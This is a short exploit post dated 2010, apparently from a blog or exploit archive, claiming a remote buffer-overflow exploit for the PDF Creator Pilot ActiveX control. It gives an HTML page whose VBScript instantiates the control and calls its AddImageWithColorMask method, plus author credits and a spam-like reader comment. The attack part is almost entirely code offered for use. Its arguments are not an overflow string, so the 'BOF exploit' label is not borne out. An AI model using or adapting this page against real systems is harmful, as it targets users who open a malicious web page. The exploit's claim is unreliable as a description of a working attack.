========================================================== PDF Creator Pilot (PDFCreatorPilot.dll) Remote BOF Exploit ==========================================================
######################################################################## # Vendor: http://www.soft32.com # Date: 2010-07-27 # Author : indoushka # Thanks to : Dz-Ghost Team # Contact : 00213771818860 # Home : www.sec4ever.net # Tested on : windows SP2 Fran?ais V.(Pnx2 2.0) ####################################################################
<html> Test Exploit page <object classid='clsid:4C26E4F7-A871-4E64-A390-DBEFCE574904' id='target' ></object> <script language='vbscript'> 'Wscript.echo typename(target) 'for debugging/custom prolog targetFile = "C:\Program Files\PDF Creator Pilot\PDFCreatorPilot.dll" prototype = "Function AddImageWithColorMask ( ByVal FileName As String , ByVal colorMask As Long ) As Long" memberName = "AddImageWithColorMask" progid = "PDFCreatorPilotLib.PDFDocument3" argCount = 2 arg1="defaultV" arg2=-1 target.AddImageWithColorMask arg1 ,arg2 </script> Save as .Html
Very insightful and interesting article. I would love to know more about this so
ReplyDeleteposting more would be appreciated.
PDFCreator